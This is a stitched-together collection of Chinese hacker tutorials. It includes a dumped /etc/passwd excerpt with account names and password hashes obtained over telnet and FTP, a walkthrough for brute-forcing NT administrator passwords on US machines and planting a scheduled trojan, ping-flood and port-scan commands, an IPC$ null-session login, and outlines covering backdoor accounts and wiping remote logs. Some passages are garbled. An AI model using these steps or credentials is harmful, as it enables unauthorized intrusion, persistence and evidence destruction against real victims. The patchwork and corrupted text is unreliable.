liheng:/home/w3/liheng:/bin/bashcaves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bashsales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bashkingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bashrecycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bashrecycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bashrecycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bashhxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bashgoodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bashrwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bashcharliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bashslb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bashs6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bashlsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bashlilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bashnalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bashtoonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bashyahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bashbasic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bashwunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bashkaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bas hfan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash(CoolFire 注: 因为使用PaSs2DiC 很容易找出ID 与Password 相同的. 故除了Coffee 外, 其它我找到密码的EnCode Password 部份皆改过..... 除非你一个一个试啦~~~ 我没说喔!)www:/etc$ exitlogoutConnection closed by foreign host.(可以走了!! 改用FTP 将/etc/passwd 给抓回来吧!).tw> ftp Connected to .220-220- 欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!220-220-220- There are 0 users in FTP Server now.220- 目前已有0 使用者在此Server 上.220- If you have any suggestion, please mail to:220- service@xx.xxxxxxx.xxx.xx.220-220-220-220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.(还是使用刚刚的帐号进入)Name (:YourName): coffee331 Password required for coffee.Password:230 User coffee logged in.Remote system type is UNIX.Using binary mode to transfer files.(直接到达档案放置地点)ftp> cd /etc250 CWD command successful.ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for file list.ttysfdprmgroupissuemotdmtoolsprofilesecurettyshellstermcapskelcsh.cshrccsh.loginlilo。

黑客入门初级教程之一(2001-12-01 19:47)来源：影子鹰网络安全组织入门初级篇之一注意：运行以下程序，在WinNT 4.0上方可成功操作一般用户均为拨号上网，速度较慢，绝对不适合大数据量攻击，比如密码强攻等，而且很容易很容易暴露自己，留下攻击痕迹，给自己带来极大的危险，所以，建立自己的中间堡垒是迈向成功的第一步。

所谓中间堡垒，实际上就是连接在高速网络上的远程计算机，我们在本地通过Telnet，控制远程计算机上运行的攻击程序，这样，没有直接对目标进行攻击，敌人很难发现，而且远程计算机有很宽的带宽，速度较快，减少攻击时间。

比如在霉国，绝大多数计算机都是通过千兆网连接到Internet，其速度不比我们在局域网慢。

那么，怎么建立自己的中间堡垒呢？在霉国，上网计算机数量巨大，几乎有40%以上的计算机是相当容易攻破的，所以，我们只要想办法功入一台位于霉国的计算机，并成功的在其上安装木马程序及攻击工具程序，接下来就好好办多了。

请看下面的我们的经历：利用Pinger程序，查找霉国的一段IP地址，如果没有任何机器，再换一段，直到找到目标，如下：可以发现，Ping程序在一连续的IP地址上，找到目标计算机的一些相关信息，比如：209.102.20.193 - SERVER，其中209.102.20.193为计算机的IP地址，SERVER为机器名，接下来，我们进入DOS，运行killusa编制的letmein.exe，如下:letmein.exe 的参数为：letmein.exe file://server/ -group -op pwd其中-group 为：( -all -admin -users -domainadmin -domainusers -guests -domainguests) -op 为：(-g: 攻击，-d 只显示用户)pwd为：mypwd例如：letmein file://111.111.111.111/ -all -g mypwd (对\\111.111.111.111上所有用户攻击)例如：letmein file://111.111.111.111/ -admin -g mypwd (对\\111.111.111.111上管理员攻击)例如：letmein file://111.111.111.111/ -all -d mypwd (显示\\111.111.111.111上所有用户)接下来，letmein程序开始取得SERVER的相关用户，并简单尝试其口令，非常幸运，SERVER 操作系统为NT，killusa很快取得SERVER上管理员为Pearson的口令为Pearson，结果如下：当然，您的运气也许没有这么好，没关系，反复试几次，终归会有一个笨蛋失误，我们以多年的经验保证您可以在霉国找到这么一台计算机！接下来，继续在DOS状态下运行：其实，这时，您已以管理员的身份登录到该机器上了，接下来，赶快将工具程序拷贝到该计算机上，如下：程序已经复制到远程计算机上，那么如何启动木马程序ntsrv.exe呢，请看：这样，在远程计算机时间13:30分(时间在letmein已显示，估计后延一点)，SERVER上的SCHEDULE服务程序将启动ntsrv.exe，并监听端口：64321，当然，端口号可以根据自己的习惯，建议在200-65360之间选折。

黑客最早源自英文hacker，早期在美国的电脑界是带有褒义的，但在媒体媒体报道中，黑客一词往往指那些软件骇客(software cracker)。

但是随着互联网的不断发展，以及网络安全的不断加固，一些人开始视黑客为一项业余的嗜好，而这些人不做恶意破坏，只追求共享黑客最早源自英文hacker，早期在美国的电脑界是带有褒义的，但在媒体媒体报道中，黑客一词往往指那些“软件骇客”(software cracker)。

但是随着互联网的不断发展，以及网络安全的不断加固，一些人开始视“黑客”为一项业余的嗜好，而这些人不做恶意破坏，只追求共享、免费，他们的出现推动了计算机和网络的发展与完善。

那么对于一些初级爱好者来说，黑客基础入门知识便显得尤为重要，今日小编就为大家带来了黑客基础入门之初级安全命令介绍，以便初学者能够更好的追求自己的业余嗜好。

在M$的操作系统中，与网络安全较有关系的几个命令/程序是：ping\winipcfg\tracert\net\at\netstat。

因此，小编将一一为大家介绍：1. ping：这是TCP/IP协议中最有用的命令之一它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远程主机很有用，它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时间。

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS][-r count] [-s count] [[-j host-list] [-k host-list]][-w timeout] destination-listOptions:-t Ping the specifed host until interrupted.（除非人为中止，否则一直ping下去）-a Resolve addresses to hostnames.（把IP转为主机名）-n count Number of echo requests to send.（响应请求的数量）-l size Send buffer size.（封包的大小）-f Set Don't Fragment flag in packet.（信息包中无碎片）-i TTL Time To Live.（时间）-v TOS Type Of Service.（服务类型）-r count Record route for count hops.-s count Timestamp for count hops.-j host-list Loose source route along host-list.-k host-list Strict source route along host-list.（较严格的……唉，怎么译好……算了，放着吧）-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间）比如大家可能都知道的一个命令# ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令（当然这样只会造成我方自己的网络阻塞）。

黑客攻防入门与进阶文字教程第一章黑客入门的必修知识查看系统进程：tasklist打开端口：netstat -a -n在DOS下查看进程：服务Remote Procedure Call (RPC) 登录-硬件配置文件profile 1 禁用查看进程起始程序：netstat -abnov查看隐藏进程：隐藏进程管理工具第二章踩点侦查与漏洞扫描扫描器软件如下：Zenmap扫描器X-Scan扫描器加载下面的黑客字典软件可以搜索ip地址SuperScan扫描器Ping + URL ：即可获取目标主机lp地址Netstat –a +ip地址即可查看与目标主机的所有连接和开放的端口、连接协议等信息追捕软件：可以查询对方ip的域名，可以查询对方机器上的提供的服务功能等关闭闲置和潜在危险的端口是将所有用户需要用的正常端口外的其他端口都关闭其操作：网上邻居—本地连接—属性—Internet协议（TCP/IP）—属性—高级—选项—属性—启用TCP/IP筛选—确定黑客字典软件（小榕黑客字典）Tcomcat 可以根据需要加载用户名称字典、密码字典，对ip范围内的主机进行弱口令扫描注入点就是可以进行注入的地方，通常是一个可以访问数据库的连接，根据注入点数据库的运行帐号的权限不同，所获得的权限也有所不同使用软件可以为：啊D注入工具第三章黑客必学的DOS命令Dir命令：Dir命令是显示磁盘目录命令。

在命令提示符窗口中输入Dir命令，然后按下Enter键，即可查看当前目录下的资源列表。

操作：在命令提示符窗口下输入Dir d：/a：d即可查看d盘的所有文件创建批处理文件：创建批处理文件可以使用记事本和copycon命令来实现批处理文件后缀名：*.bat使用Dos命令扫描端口：如果没有扫描工具，就可以使用Dos命令对一个网段的所有端口进行扫描。

运行—cmd—输入命令（如for ％ａin (1,1,,254）do for %b in (1,1,65535) do start /low/min telnet 192.168.0 %a %b 按下Enter键，即可扫描192.168.0.x这个网段所有开放的3389端口主机Arp命令：当黑客入侵内部网络后，可以在任何一台主机中使用Arp –a命令显示ARP缓存表。

黑客技术入门教程1. 简介黑客技术在当今互联网时代扮演着重要且复杂的角色。

黑客术语有时会被误用，被人们误解为一种破坏和非法行为。

然而，真正的黑客技术是一种研究和试验的过程，旨在了解系统的运作方式，并从中找到漏洞。

本教程将为您介绍黑客技术的基础知识和概念，帮助您了解黑客世界的基本原理。

2. 黑客的类型2.1 道德黑客道德黑客，也被称为白帽黑客，是指以合法和道德的方式测试和保护计算机系统的安全性的专业人员。

他们通过模拟攻击来评估系统的弱点，并向系统管理员提供建议和解决方案。

道德黑客的主要目标是确保系统的安全性，防止真正的黑客攻击。

2.2 黑帽黑客黑帽黑客是指以非法和破坏性的方式入侵计算机系统的人。

他们利用系统漏洞和弱点来获取未经授权的访问权限，以获取敏感信息、盗取财产或破坏系统。

黑帽黑客是非法的，并且他们的行为对他人造成了严重的负面影响。

2.3 灰帽黑客灰帽黑客位于道德黑客和黑帽黑客之间，他们既可以合法地测试系统安全性，也可以超越法律边界进行非法行为。

他们的动机可能包括获得知识、为社区提供安全保护或者追求个人利益。

3. 基础技术3.1 网络扫描网络扫描是黑客使用的常见技术之一。

它旨在发现目标系统的开放端口和服务，以便进一步攻击。

常见的网络扫描工具包括Nmap和Zenmap等，它们可以提供关于目标网络的详细信息。

3.2 社会工程学社会工程学是黑客使用的一种心理学技术，旨在获取对系统的未经授权访问。

通过欺骗和伪装等手段，黑客可以获得用户的敏感信息，例如用户名和密码。

防范社会工程学攻击的最佳方法是教育用户，让他们了解并警惕此类攻击。

3.3 漏洞利用漏洞利用是黑客入侵系统的一种方式，它利用系统中存在的软件漏洞和弱点。

黑客可以通过利用漏洞来获取对系统的完全控制。

为了保护系统，及时修复和更新软件是至关重要的。

4. 保护措施4.1 密码安全密码安全是保护计算机系统的重要一环。

用户应该选择强密码，并定期更改密码以确保安全性。

新手学黑客攻防(入门篇)新手学黑客攻防（入门篇）内容简介随着互联网技术的不断发展，信息交流更加高效、便捷，各种新的网络功能不断涌现，网络在促进经济发展、推动社会进步和提高人们的生活质量等方面发挥着越来越重要的作用。

然而与此同时，网络的安全问题也变得日趋严重，需要引起每一个电脑用户的重视。

在网络中有一群被称为“黑客”的神秘人物。

最早黑客是指热心于计算机技术、水平高超的电脑专家，尤指程序设计人员。

但到了今天，黑客已被用于泛指那些专门利用电脑搞破坏或恶作剧的家伙。

作为一个有一定操作经验的电脑用户，读者有必要了解一些黑客的知识，通过模拟黑客的行为准则以及入侵网络的方式、方法，反过来发现自身存在的问题，做好防范工作，从而最终保证自己的数据信息和网络财产的安全。

本书共11章。

第1章介绍黑客的基础知识，包括黑客入侵的途径、入侵命令以及入侵的方式。

第2章介绍Windows 系统中存在的安全隐患和漏洞。

第3章介绍针对Windows 系统中存在的漏洞如何设置电脑，从而实现防范黑客通过漏洞攻击电脑的目的。

第4章~第6章介绍黑客从信息收集、植入木马、到最后进行远程控制与入侵的一个完整流程。

第7章~第9章介绍黑客如何对QQ、电子邮件与网页进行攻击，以及电脑用户应该怎样防范。

第10章介绍防范木马与黑客的一些小方法。

最后的第11章介绍被黑客入侵后，如何隐藏信息与创建后门。

本书采用全彩印刷，配1张多媒体教学视频光盘。

彩色印刷能使图文对比更加鲜明、直观，使学习过程更加愉悦。

多媒体教学视频让读者像看电视一样学电脑，学习效果立竿见影。

目录第1章黑客基础知识1.1 黑客的概述1.2黑客必经的两道门：IP地址与端口1.2.1 IP和IP地址1.2.2 端口的概述1.2.3 查看端口1.2.4 关闭端口和限制端口1.3 黑客常用命令1.3.1 路由与网关1.3.2 ping命令1.3.3 net命令1.3.4 telnet命令1.3.5 ftp命令1.3.6 netstat命令1.3.7 tracert命令1.3.8 ipconfig命令1.3.9 route命令1.3.10 netsh命令1.3.11 arp命令1.4 黑客入侵方式第2章Windows系统中的漏洞2.1Windows系统的安全隐患2.1.1 Windows系统漏洞产生的原因2.1.2 Windows系统漏洞的安全隐患2.2 Windows 2000系统中的漏洞2.2.1 输入法漏洞2.2.2 Unicode漏洞2.2.3 ISAPI缓冲区扩展溢出漏洞2.2.4 MS SQL Server的SA空密码漏洞2.2.5 系统管理权限漏洞2.2.6 路径优先漏洞2.2.7 NetDDE消息权限提升漏洞2.2.8 RDP拒绝服务漏洞2.2.9 域控制器拒绝服务漏洞2.2.10 事件查看器存在缓冲区溢出2.2.11 UDP套接字拒绝服务漏洞2.2.12 安全账户管理漏洞2.2.13 IIS 5.0的HTR映射远程堆溢出漏洞2.2.14 IIS 5.0的ASP缓冲溢出漏洞2.2.15 Narrator本地密码信息泄露漏洞2.2.16 SMTP认证漏洞2.2.17 IIS 5.0/5.1验证漏洞2.2.18 SQL Server的函数库漏洞2.2.19 IIS 5.0伪造Content-Length拒绝服务漏洞2.2.20 调试寄存器漏洞2.2.21 drwtsn32.exe文件漏洞2.2.22 快捷方式漏洞2.2.23 UTF漏洞2.2.24 IIS 5.0 SEARCH方法远程攻击漏洞2.2.25 LDAP漏洞2.2.26 IIS 5.0拒绝服务漏洞2.2.27 Telnet漏洞2.2.28 登录服务恢复模式空密码漏洞2.2.29 默认注册许可漏洞2.2.30 域账号锁定漏洞2.2.31 终端服务器登录缓存溢出漏洞2.2.32 ActiveX参数漏洞2.2.33 IIS 5.0 Cross-Site scripting漏洞2.2.34 组策略漏洞2.2.35 Outlook Express数字签名缓冲区溢出漏洞2.2.36 ActiveX控件漏洞2.2.37 SMB漏洞2.2.38 网络连接管理器漏洞2.3 Windows XP系统中的漏洞2.3.1 UPnP缓冲溢出漏洞2.3.2 压缩文件夹远程任意命令执行漏洞2.3.3 升级程序漏洞2.3.4 帮助和支持中心漏洞2.3.5 服务拒绝漏洞2.3.6 Windows Media Player漏洞2.3.7 热键漏洞2.3.8 RDP漏洞2.3.9 VM漏洞2.3.10 账号快速切换漏洞第3章个人计算机的安全防护策略3.1 计算机的密码设置3.1.1 设置开机登录密码3.1.2 设置待机后恢复密码3.1.3 设置屏保恢复后的密码3.2 注册表安全设置3.2.1 注册表的概述3.2.2 防止系统隐私信息被泄露3.2.3 关闭默认共享3.2.4 设置Windows的自动登录3.2.5 驱除系统中的随机启动木马3.2.6 清除恶意代码3.2.7 防止SYN洪水攻击3.3 组策略的安全设置3.3.1 组策略的概述3.3.2 重命名默认账户名3.3.3 账户锁定策略3.3.4 设置密码策略3.3.5 禁止访问注册表3.3.6 禁止访问控制面板3.3.7 隐藏桌面上的系统图标3.3.8 设置用户权限3.3.9 防止用户使用添加或删除程序3.3.10 限制使用应用程序3.4 Windows XP的安全设置3.4.1 开启Windows防火墙3.4.2 给文件加密3.4.3 锁定计算机3.4.4 给系统打补丁第4章信息搜集、嗅探与扫描4.1 信息搜集4.1.1 获取IP地址4.1.2 根据IP地址获取地理位置4.1.3 查询网站备案信息4.2 检测系统漏洞4.2.1 扫描器的概述4.2.2 搜索局域网共享资源4.2.3 使用LanExplorer搜索4.2.4 使用MBSA检测系统安全性4.3 嗅探器的使用4.3.1 嗅探器概述4.3.2 用Sniffer Portable捕获数据4.3.3 用“艾菲网页侦探”捕获网页内容4.4 端口扫描4.4.1 端口扫描的原理与分类4.4.2 使用X-Scan进行端口扫描4.4.3 使用SuperScan进行端口扫描第5章木马的入侵5.1 木马的概述5.1.1 木马的概念和结构5.1.2 木马的种类5.1.3 木马的特征5.1.4 木马的入侵方式5.1.5 木马的伪装手段5.1.6 识别木马5.1.7 防范木马的入侵5.2 捆绑木马5.2.1 使用“EXE捆绑机”捆绑木马5.2.2 其他常见的捆绑器5.2.3 网页木马生成器5.3 黑客常用的木马工具5.3.1 “冰河”木马5.3.2 “广外女生”木马第6章远程控制技术6.1 基于认证入侵6.1.1 IPC？入侵与防范6.1.2 Telnet入侵概述6.2 利用注册表入侵6.2.1 修改注册表实现远程监控6.2.2 开启远程注册表服务6.3 使用“远程控制任我行”远程控制软件6.3.1 配置“远程控制任我行”6.3.2 监视并控制远程计算机6.4 远程监视与控制6.4.1 使用“网络执法官”监控局域网6.4.2 使用QuickIP进行多点控制第7章 QQ攻防战7.1 黑客攻击QQ的常用手段7.2 利用本地信息攻击QQ7.2.1 使用“QQ聊天记录查看器”查看聊天记录7.2.2 利用本地资料破解QQ密码7.3 远程攻击QQ7.3.1 QQ强制聊天7.3.2 使用“QQ狙击手”进行IP探测7.4 保护好自己的QQ7.4.1 防止QQ密码被破译7.4.2 防范QQ炸弹7.4.3 防范IP地址被探测7.4.4 利用“QQ医生”查杀QQ木马病毒7.4.5 申请密码保护第8章电子邮件攻防战8.1 电子邮件病毒8.1.1 邮件病毒定义及特征8.1.2 识别“邮件病毒”8.1.3 防范“邮件病毒”8.2 认识电子邮件炸弹8.2.1 电子邮件炸弹的定义8.2.2 电子邮件炸弹的危害8.2.3 防范电子邮件炸弹8.3 获取电子邮箱密码的方式8.3.1 使用Web Cracker 4.0获取Web邮箱密码8.3.2 使用“流光”探测电子邮箱账号与密码第9章网页攻防战9.1 恶意代码9.1.1 恶意代码的概述9.1.2 非过滤性病毒9.2 常见的网页炸弹攻击原理与防御方法9.3 利用注册表清除恶意代码9.3.1 清除自动弹出的网页和对话框9.3.2 利用注册表还原被强行修改的IE标题栏和默认首页9.3.3 利用注册表清除网络实名9.3.4 注册表被恶意代码禁用9.4 IE浏览器的安全设置9.4.1 删除上网后的历史记录9.4.2 设置安全可靠的网页和不安全的网页9.4.3 屏蔽各种广告第10章防范木马与黑客10.1 防范IP地址和端口被探测10.1.1 设置代理服务器10.1.2 关闭端口10.1.3 配置安全策略保护端口10.2 驱逐间谍软件10.2.1 使用Ad-Aware驱逐间谍软件10.2.2 使用“安博士”检查间谍软件10.3 清除木马的常用软件10.3.1 使用“Windows进程管理器”管理进程10.3.2 使用“超级兔子”清除木马10.3.3 使用360安全卫士维护系统安全第11章信息隐藏与后门清理11.1 入侵隐藏技术11.1.1 跳板技术11.1.2 文件隐藏技术11.1.3 代理服务器11.1.4 Sock5代理跳板11.1.5 端口重定向11.2 账户隐藏技术11.2.1 利用“命令提示符”创建后门账户11.2.2 通过“注册表”创建后门账户11.2.3 清除隐藏账户11.3 其他常见的后门11.3.1 系统服务后门11.3.2 木马程序后门11.4 清除登录服务器的事件日志11.4.1 事件日志的概述11.4.2 手工清除自己计算机中的日志11.4.3 清除远程主机上的日志11.4.4 通过工具清除事件日志。

最简单的黑客入门教程目录1黑客简介 (2)2保护自己电脑绝对不做黑客肉鸡 (2)3抓肉鸡的几种方法 (5)4防止黑客通过EGplorer侵入系统 (9)5SQL注入详解 (10)5.1注入工具 (11)5.2php+MPsql注入的误区 (11)5.3简单的例子 (12)5.4语句构造 (14)5.5高级应用 (22)5.6实例 (26)5.7注入的防范 (29)5.8我看暴库漏洞原理及规律1 (29)5.9我看暴库漏洞原理及规律2 (32)6跨站脚本攻击 (34)6.1跨站脚本工具 (34)6.2什么是GSS攻击 (35)6.3如何寻找GSS漏洞 (35)6.4寻找跨站漏洞 (36)6.5如何利用 (36)6.6GSS与其它技术的结合 (38)7GPath注入 (38)7.1GPath注入介绍 (38)7.2GPath注入工具 (41)声明：文章来源大多是网上收集而来，版权归其原作者所有。

1黑客简介"黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。

关于"黑客"一词的经典定义，最初来源于麻省理工学院关于信息技术的一份文档，之后便被新闻工作者们长期使用。

但是这个在麻省理工被当做中性词汇的术语，却逐渐被新闻工作者们用在了贬义的环境，而很多人也受其影响，最终导致了"黑客"一词总是用于贬义环境。

有些人认为，我们应该接受"黑客"一词已经被用滥并且有了新的意义。

他们认为，如果不认可这种被滥用的词汇，那么将无法与那些不懂技术的人进行有效的交流。

而我仍然认为，将黑客和恶意的骇客(cracker)分开表述，对交流会更有效，比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象，从而能够达到更好的沟通交流效果，也避免了对"黑客"一词的滥用。

之所以要区分黑客和恶意骇客，是因为在某些情况下，我们讨论的对象是那些毫无恶意并且不会对安全防御或者用户隐私造成损害的对象，这些人只有用"黑客"这个词来描述才最贴切。

黑客营基础教学一（认证的入侵）按照上级领导的命令，凡人MM今天又要通宵了！脸上长豆豆的话我觉得找他们拼了！:(今天给大家介绍的是一个关于认证的专题（为了介绍方便，假设目标主机/服务器的认证密码为空，或者非常简单,其实这在现实中还是有大量这样的主机存在的！）一般的思路1) 建立IPC$连接PC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

2) 利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员峤 沟汲鲇没Я斜淼?。

3)我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。

4) 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.5) 开启远程主机中被禁用的Telnet服务6) 断开IPC$l连接4）去掉NTML验证首先给大家说说IPC$大家应该知道的内容吧&sup2; IPC$的定义（大家应该都知道吧。

）&sup2; 在MS-DOS下敲入net share 查看本机的共享资源&sup2; 几个基本的DOS命令dir(列出当前路径下文件) cd（进入指定命令）cls（清屏）netstat –n（查看本机网络连接状态）nbstat -a IP（查看指定IP主机的netbios 信息）net user (系统帐号类操作) netlocalgroup(系统组操作) net user（远程连接）net send（信使命令）net time （查看远程主机系统时间）好了现在来跟我一起建立IPC$主机连接l 在“开始”-运行-“CMD”下面开始经典的模式l 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" l这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。